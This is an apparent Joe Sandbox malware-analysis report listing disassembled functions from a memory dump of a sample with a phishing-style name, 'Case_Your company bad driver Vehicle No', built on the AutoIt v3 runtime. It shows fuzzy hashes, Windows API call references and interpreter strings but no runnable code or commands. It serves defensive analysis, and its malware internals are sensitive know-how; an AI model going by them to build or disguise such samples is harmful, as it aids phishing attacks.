Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 98025e1ff72c43c13a439120abd8039e59252b6e33a7e1e2b0aef10d296fa18b
Instruction ID: e4427d5a6c385b88f7d34f7482031e0bb1e1d9e183e2d643c560f848bfddc0ef
Opcode Fuzzy Hash: 98025e1ff72c43c13a439120abd8039e59252b6e33a7e1e2b0aef10d296fa18b
Instruction Fuzzy Hash: 9DA0123001010CA78A001B41EC046497F5CD6011907004020F40C41031873254114980

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c45ccbac217ae58d9d6f92c98e195708f9246b318bc5633e01fe988378f399da
Instruction ID: b6af68e281894beaf26ee4b6908ab9d2966a2c7c46d95f25397afaef2cb316ff
Opcode Fuzzy Hash: c45ccbac217ae58d9d6f92c98e195708f9246b318bc5633e01fe988378f399da
Instruction Fuzzy Hash: 99220630905626DBDF288B18C4D4B7F77E1EB45304F6885AEE8929B2D1DB319E81DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00BD2405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 91144f72761351dfa8d80c6790787218dfba7903250b3bc2341e8f3fe7ff6d50
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 07C1613620519309DB2D473D947453EFAE19EB27B131A0BDFE8B2CB6C4FE20D524A620

Uniqueness

Uniqueness Score: -1.00%

Function 00BD283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 6c80fc93697c366134bde0c57151a11fa9671a8ffd4fa61775f056104c0e5ab1
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: C9C1613620519309DB2D473D947413EFBE19AA27B131A1BEFE4B2DB6D4FF20D524A620

Uniqueness

Uniqueness Score: -1.00%

Function 00BD1BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: b862fe47333a492f6d5da0a72dfdc2233a8fabfdf2db100c13764c47da97c9da
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 60C162362051531ADB2D463D947413EFBE2DAA27B131A0FEEE4B2CB6D4FF10D5249610

Uniqueness

Uniqueness Score: -1.00%

Function 00C27B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C27B70
DeleteObject.GDI32(00000000), ref: 00C27B82
DestroyWindow.USER32 ref: 00C27B90
GetDesktopWindow.USER32 ref: 00C27BAA
GetWindowRect.USER32(00000000), ref: 00C27BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C27CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C27D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C27D4A
GetClientRect.USER32(00000000,?), ref: 00C27D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C27D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C27DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C27DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C27DD0
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C27DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C27DE8
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C27DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C27DF8
GlobalFree.KERNEL32(00000000), ref: 00C27E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C27E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00C42CAC,00000000), ref: 00C27E2B
GlobalFree.KERNEL32(00000000), ref: 00C27E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C27E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C27E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C27EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C2808F

Strings

DISPLAY, xrefs: 00C27EF2
AutoIt v3, xrefs: 00C27D42
static, xrefs: 00C27D8A, 00C27EE1
, xrefs: 00C28015

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: b456049e91f6e028e6b22d7e19bd5de9f452f468b5fc992cc40115f3f3c383bd
Instruction ID: 72306e39e29178a866a92e95dca6c9d544ac902dd093aab0e00eece70f4bffd5
Opcode Fuzzy Hash: b456049e91f6e028e6b22d7e19bd5de9f452f468b5fc992cc40115f3f3c383bd
Instruction Fuzzy Hash: CC027B71A10219EFDB14DFA4DD89FAE7BB9FB48310F108558F915AB2A1CB70AD41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C337F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00C3F910), ref: 00C338AF
IsWindowVisible.USER32(?), ref: 00C338D3

Strings

CURRENTTAB, xrefs: 00C33945
UNCHECK, xrefs: 00C33B0B
GETCURRENTLINE, xrefs: 00C33B75
ISENABLED, xrefs: 00C338F3
SELECTSTRING, xrefs: 00C33A8E
TABRIGHT, xrefs: 00C33925
DELSTRING, xrefs: 00C339D1
TABLEFT, xrefs: 00C3390F
ISCHECKED, xrefs: 00C33AC1
FINDSTRING, xrefs: 00C339FE
CHECK, xrefs: 00C33AF5
EDITPASTE, xrefs: 00C33BE7
SENDCOMMANDID, xrefs: 00C33C62
SETCURRENTSELECTION, xrefs: 00C33A3E
ADDSTRING, xrefs: 00C3399E
SHOWDROPDOWN, xrefs: 00C33968
GETCURRENTSELECTION, xrefs: 00C33A6B
ISVISIBLE, xrefs: 00C338BF
GETSELECTED, xrefs: 00C33B2B
GETCURRENTCOL, xrefs: 00C33BB0
GETLINECOUNT, xrefs: 00C33B4E
GETLINE, xrefs: 00C33C23
HIDEDROPDOWN, xrefs: 00C33988

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 91d4346fd64b9d60c5234ed7a39b3fa371e6144e527f9d7bce78c7d69ec35f93
Instruction ID: 318ab5b69ddacb194ea6ab4785c82788c5f2fc969dc686e09df0c0d01ad050bd
Opcode Fuzzy Hash: 91d4346fd64b9d60c5234ed7a39b3fa371e6144e527f9d7bce78c7d69ec35f93
Instruction Fuzzy Hash: BFD18130224345DBCB24EF21C451B6AB7E6AF94344F1045A9F8969B3E3DB71EE4ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00C3A89F
GetSysColorBrush.USER32(0000000F), ref: 00C3A8D0
GetSysColor.USER32(0000000F), ref: 00C3A8DC
SetBkColor.GDI32(?,000000FF), ref: 00C3A8F6
SelectObject.GDI32(?,?), ref: 00C3A905
InflateRect.USER32(?,000000FF,000000FF), ref: 00C3A930
GetSysColor.USER32(00000010), ref: 00C3A938
CreateSolidBrush.GDI32(00000000), ref: 00C3A93F
FrameRect.USER32(?,?,00000000), ref: 00C3A94E
DeleteObject.GDI32(00000000), ref: 00C3A955
InflateRect.USER32(?,000000FE,000000FE), ref: 00C3A9A0
FillRect.USER32(?,?,?), ref: 00C3A9D2
GetWindowLongW.USER32(?,000000F0), ref: 00C3A9FD

Part of subcall function 00C3AB60: GetSysColor.USER32(00000012), ref: 00C3AB99
Part of subcall function 00C3AB60: SetTextColor.GDI32(?,?), ref: 00C3AB9D
Part of subcall function 00C3AB60: GetSysColorBrush.USER32(0000000F), ref: 00C3ABB3
Part of subcall function 00C3AB60: GetSysColor.USER32(0000000F), ref: 00C3ABBE
Part of subcall function 00C3AB60: GetSysColor.USER32(00000011), ref: 00C3ABDB
Part of subcall function 00C3AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C3ABE9
Part of subcall function 00C3AB60: SelectObject.GDI32(?,00000000), ref: 00C3ABFA
Part of subcall function 00C3AB60: SetBkColor.GDI32(?,00000000), ref: 00C3AC03
Part of subcall function 00C3AB60: SelectObject.GDI32(?,?), ref: 00C3AC10
Part of subcall function 00C3AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00C3AC2F
Part of subcall function 00C3AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C3AC46
Part of subcall function 00C3AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00C3AC5B

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: d277fb54ca52782d7d63b2c7679d2b52652f9ea3e640e8830aed4cf533758174
Instruction ID: 94f2eb843022d0f7b83169b6ffe9ec2e3a15add861167b1b01f84ec91b9b34c7
Opcode Fuzzy Hash: d277fb54ca52782d7d63b2c7679d2b52652f9ea3e640e8830aed4cf533758174
Instruction Fuzzy Hash: 19A16C72418301BFD7109F64DD08B6FBBA9FB88321F104A2DF9A2961E1D771D946CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00BB2CA2
DeleteObject.GDI32(00000000), ref: 00BB2CE8
DeleteObject.GDI32(00000000), ref: 00BB2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00BB2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00BB2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00BEC68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BEC6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00BECAED

Part of subcall function 00BB1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BB2036,?,00000000,?,?,?,?,00BB16CB,00000000,?), ref: 00BB1B9A

SendMessageW.USER32(?,00001053), ref: 00BECB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BECB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00BECB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00BECB62

Strings

0, xrefs: 00BEC981

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 3c5caa0f8ccaa3b6116eb88ae21935c4d1b770b23f0de3ef1b6282e609f961ba
Instruction ID: e752354f9e5f3ef70ae1b7667cd2eeb9ed15bfa44bc796dc0287489d364299dd
Opcode Fuzzy Hash: 3c5caa0f8ccaa3b6116eb88ae21935c4d1b770b23f0de3ef1b6282e609f961ba
Instruction Fuzzy Hash: B0129A30600241EFDB25CF25C988BB9BBE5FF45300F5445A9E99ADB262C771EC82DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C277BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00C277F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C278B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C278EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C27900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C27946
GetClientRect.USER32(00000000,?), ref: 00C27952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C27996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C279A5
GetStockObject.GDI32(00000011), ref: 00C279B5
SelectObject.GDI32(00000000,00000000), ref: 00C279B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C279C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C279D2
DeleteDC.GDI32(00000000), ref: 00C279DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C27A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00C27A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C27A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C27A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00C27A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C27AAE
GetStockObject.GDI32(00000011), ref: 00C27AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C27AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C27ACE

Strings

msctls_progress32, xrefs: 00C27A4F
DISPLAY, xrefs: 00C2799B
AutoIt v3, xrefs: 00C2793E
static, xrefs: 00C27990, 00C27AA8

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 78f02f26e9e674e04b1656e0798ef5274d06318c115a1ee5da55fb6018d5f699
Instruction ID: 7407a5b4127884dfe787184cba0807b2b0f03b09991ef6e7e3f46d703d205226
Opcode Fuzzy Hash: 78f02f26e9e674e04b1656e0798ef5274d06318c115a1ee5da55fb6018d5f699
Instruction Fuzzy Hash: 7FA182B1A50615BFEB14DFA4DC4AFAE7BB9EB44710F004518FA15A72E1CBB0AD01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C1AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C1AF89
GetDriveTypeW.KERNEL32(?,00C3FAC0,?,\\.\,00C3F910), ref: 00C1B066
SetErrorMode.KERNEL32(00000000,00C3FAC0,?,\\.\,00C3F910), ref: 00C1B1C4

Strings

Network, xrefs: 00C1B0A4
MMC, xrefs: 00C1B185
Removable, xrefs: 00C1B0B8
Fibre, xrefs: 00C1B154
ATAPI, xrefs: 00C1B138
SATA, xrefs: 00C1B177
ATA, xrefs: 00C1B13F
FileBackedVirtual, xrefs: 00C1B193
Fixed, xrefs: 00C1B0AE
iSCSI, xrefs: 00C1B169
SAS, xrefs: 00C1B170
SSD, xrefs: 00C1B0F1
Unknown, xrefs: 00C1B086, 00C1B12A
SSA, xrefs: 00C1B14D
PhysicalDrive, xrefs: 00C1B012
\\.\, xrefs: 00C1AFDB
Virtual, xrefs: 00C1B18C
1394, xrefs: 00C1B146
SCSI, xrefs: 00C1B131
RAMDisk, xrefs: 00C1B090
USB, xrefs: 00C1B15B
RAID, xrefs: 00C1B162
CDROM, xrefs: 00C1B09A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: b13bfe8412a969963f424f135f9763ce2ba4957e498fb40d25e7490498953286
Instruction ID: 67cf992e33fc8f47e75163822af903ee5908755bb7f2a58c0e9bc8036f366abc
Opcode Fuzzy Hash: b13bfe8412a969963f424f135f9763ce2ba4957e498fb40d25e7490498953286
Instruction Fuzzy Hash: 80519130684305FBCB24DB11C9929FD73B0AB563817314065E81AB7290CB65AE82FF42

Uniqueness

Uniqueness Score: -1.00%

Function 00BB6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00BB6A91
__wcsnicmp.LIBCMT ref: 00BB6AA9
__wcsnicmp.LIBCMT ref: 00BB6AC1
__wcsnicmp.LIBCMT ref: 00BB6AD9
__wcsnicmp.LIBCMT ref: 00BB6AF1
__wcsnicmp.LIBCMT ref: 00BB6B09
__wcsnicmp.LIBCMT ref: 00BB6B21
__wcsnicmp.LIBCMT ref: 00BB6B35
__wcsnicmp.LIBCMT ref: 00BB6B76
__wcsnicmp.LIBCMT ref: 00BB6B8A
__wcsnicmp.LIBCMT ref: 00BB6B9E
__wcsnicmp.LIBCMT ref: 00BB6BB2

Strings

#include-once, xrefs: 00BB6AEB
#pragma compile, xrefs: 00BB6A8B
#requireadmin, xrefs: 00BB6ABB
Bad directive syntax error, xrefs: 00BEE743
Unterminated group of comments, xrefs: 00BEE82C
#notrayicon, xrefs: 00BB6AA3
#cs, xrefs: 00BB6B2F, 00BB6B84
#comments-start, xrefs: 00BB6B1B, 00BB6B70
#OnAutoItStartRegister, xrefs: 00BB6AD3
Cannot parse #include, xrefs: 00BEE819
#include, xrefs: 00BB6B03
#comments-end, xrefs: 00BB6B98
#ce, xrefs: 00BB6BAC

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: d96e671c60e285383a020682e8646708279064cc45abc2c449450d94b8ac5c99
Instruction ID: 4d8a5caa7935619acc3487f28afe1d7d092beee7049905a64d13897c224a26f8
Opcode Fuzzy Hash: d96e671c60e285383a020682e8646708279064cc45abc2c449450d94b8ac5c99
Instruction Fuzzy Hash: 9C81D670740245BBCB20AB65CD83FFEB7E8EF15700F0440B6F945AA196EBA4EE45C661

Uniqueness

Uniqueness Score: -1.00%

Function 00C3AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00C3AB99
SetTextColor.GDI32(?,?), ref: 00C3AB9D
GetSysColorBrush.USER32(0000000F), ref: 00C3ABB3
GetSysColor.USER32(0000000F), ref: 00C3ABBE
CreateSolidBrush.GDI32(?), ref: 00C3ABC3
GetSysColor.USER32(00000011), ref: 00C3ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C3ABE9
